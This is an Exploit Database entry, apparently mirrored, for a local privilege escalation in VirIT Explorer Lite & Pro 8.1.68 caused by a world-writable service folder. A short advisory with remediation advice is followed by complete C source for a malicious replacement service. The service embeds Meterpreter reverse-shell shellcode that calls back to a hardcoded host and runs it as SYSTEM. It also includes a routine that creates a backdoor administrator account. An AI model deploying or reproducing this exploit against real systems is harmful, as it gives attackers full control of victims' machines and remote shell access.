VirIT Explorer Lite & Pro 8.1.68 – Local Privilege Escalation

• Exploit Database
• 15 阅读

• 作者： Paolo Stagno
  日期： 2016-05-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39843/

• /*
  Full title:			VirIT Explorer Lite & Pro v.8.1.68 Local Privilege Escalation (System)/Arbitrary Code Execution
  Exploit Author:		Paolo Stagno - voidsec@voidsec.com
  Vendor Homepage:	http://www.tgsoft.it
  Version:			VirIT Explorer Lite & Pro v.8.1.68
  Tested on:			Windows 7
  CVE:				TBD
  CVSS v2:	6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:H/RL:U/RC:C) - https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=%28AV:L/AC:L/Au:S/C:C/I:C/A:C/E:H/RL:U/RC:C%29
  Category:			local exploits
  Platform:			windows
  Security Risk:		High
  Date add: 18/05/2016
  
  ===
  VirIT Explorer Lite & Pro v.8.1.68 Local Privilege Escalation (SYSTEM
  Privilege)/Arbitrary Code Execution
  
  - Author: Paolo Stagno
  
  Overview
  =========
  Vir.IT eXplorer [1] is an AntiVirus, AntiSpyware and AntiMalware
  software made in Italy and developed by TG Soft S.a.s.
  
  A major flaws exists in the last version of Vir.IT eXplorer, this
  vulnerability allow a local attacker,
  to execute arbitrary code in the context of the application with SYSTEM
  privilege.
  
  Details
  ==========
  The flaw resides in the viritsvclite Service due to bad privileges for
  the main Vir.IT folder, by default, any user (even guest) will be able to
  replace, modify or alter the file. This would allow an attacker to
  inject code or replace the executable and have it run in the context
  of the system.
  
  This would allow a complete compromise of the system on which the
  antivirus was installed; an attacker can replace the executable, reboot
  the system and it would then compromise the machine. As NT
  AUTHORITY\SYSTEM is the highest privilege level on a Windows machine,
  this allows a total control and access to the system.
  
  Services: viritsvclite
  Folder: %SYSTEMDRIVE%\VEXPLite
  Executable: %SYSTEMDRIVE%\VEXPLite\viritsvc.exe
  
  [2] icacls.exe VEXPLite
  C:\VEXPLite Everyone:(OI)(CI)(F) <=================== Vulnerable
  BUILTIN\Administrators:(I)(F)
  BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
  NT AUTHORITY\SYSTEM:(I)(F)
  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
  BUILTIN\Users:(I)(OI)(CI)(RX)
  NT AUTHORITY\Authenticated Users:(I)(M)
  NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
  
  Successfully processed 1 files; Failed processing 0 files
  
  icacls.exe viritsvc.exe
  viritsvc.exe Everyone:(I)(F) <=================== Vulnerable
  BUILTIN\Administrators:(I)(F)
  NT AUTHORITY\SYSTEM:(I)(F)
  BUILTIN\Users:(I)(RX)
  NT AUTHORITY\Authenticated Users:(I)(M)
  
  Successfully processed 1 files; Failed processing 0 files
  
  With this flaws in mind I wrote the exploit which is able to obtain NT
  AUTHORITY\SYSTEM via a meterpreter shell.
  
  Exploit
  ==========
  https://gist.github.com/VoidSec/9971092829dd1fec146e1595843aae65
  https://www.youtube.com/watch?v=5a09efEvjTk (video proof)
  
  Remediation
  ==========
  Remove the permissions on the VEXPLite folder, all of its files and on
  the viritsvc.exe Service executables to allow only
  privileged users to alter the files, apply vendor patch once distributed.
  
  Footnotes
  ==========
  [1] http://www.tgsoft.it/english/prodotti_eng.asp
  [2] https://technet.microsoft.com/en-us/library/cc753525%28WS.10%29.aspx
  ---
  
  */
  #include <windows.h>
  #include <stdio.h>
  
  #define small_sleep 5000
  #define big_sleep 180000
  
  SERVICE_STATUS ServiceStatus;
  SERVICE_STATUS_HANDLE hStatus;
  
  void ServiceMain(int argc, char **argv);
  void ControlHandler(DWORD request);
  typedef short (CALLBACK * FuncType) (LPCTSTR);
  
  /*Meterpreter reverse payload (windows/meterpreter/reverse_tcp), replace with your own*/
  unsigned char r_shell[] = 
  "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
  "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
  "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
  "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
  "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
  "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
  "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
  "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
  "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
  "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
  "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
  "\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xc0\xa8\x01\x8a\x68\x02"
  "\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
  "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
  "\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00"
  "\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
  "\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
  "\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
  "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00"
  "\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
  "\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff"
  "\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
  "\x53\xff\xd5";
  
  int Spawn_Shell(){
  	//Spawn the reverse shell
  int (*func)();
  func = (int (*)()) r_shell;
  (int)(*func)();	
  }
  
  int Add_Admin(){
  	//ADD VoidSec:secret to Local Administrators
  	system("net user VoidSec secret /ADD");
  	system("net localgroup Administrators VoidSec /ADD"); return 0;
  }
  
  int main(){
  	SERVICE_TABLE_ENTRY ServiceTable[2];
  	ServiceTable[0].lpServiceName = "viritsvclite";
  	ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION) ServiceMain;
  	ServiceTable[1].lpServiceName = NULL;
  	ServiceTable[1].lpServiceProc = NULL;
  	StartServiceCtrlDispatcher(ServiceTable);
  
  	return 0;
  }
  
  void ServiceMain(int argc, char **argv) {
  	ServiceStatus.dwServiceType = SERVICE_WIN32;
  	ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
  	ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
  	ServiceStatus.dwWin32ExitCode = 0;
  	ServiceStatus.dwServiceSpecificExitCode = 0;
  	ServiceStatus.dwCheckPoint = 0;
  	ServiceStatus.dwWaitHint = 0;
  	hStatus = RegisterServiceCtrlHandler("viritsvclite", (LPHANDLER_FUNCTION) ControlHandler);
  	ServiceStatus.dwCurrentState = SERVICE_RUNNING;
  	SetServiceStatus(hStatus, &ServiceStatus);
  	
  	//Big sleep (3m), let Windows start Network, DHCP etc.
  	Sleep(big_sleep);
  	
  	Spawn_Shell();
  	//Add_Admin();
  	
  	//Let our service run instead of kill it (only works with Add_Admin, Spawn_Shell will kill it on exit)
  	/*while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {
  		Sleep(small_sleep);
  	}*/
  		
  	return;
  }
  
  void ControlHandler(DWORD request) {
  	switch (request) {
  		case SERVICE_CONTROL_STOP:
  			ServiceStatus.dwWin32ExitCode = 0;
  			ServiceStatus.dwCurrentState = SERVICE_STOPPED;
  			SetServiceStatus(hStatus, &ServiceStatus);
  		return;
  		case SERVICE_CONTROL_SHUTDOWN:
  			ServiceStatus.dwWin32ExitCode = 0;
  			ServiceStatus.dwCurrentState = SERVICE_STOPPED;
  			SetServiceStatus(hStatus, &ServiceStatus);
  		return;
  		default:
  		break;
  		}
  	SetServiceStatus(hStatus, &ServiceStatus);
  		
  	return;
  }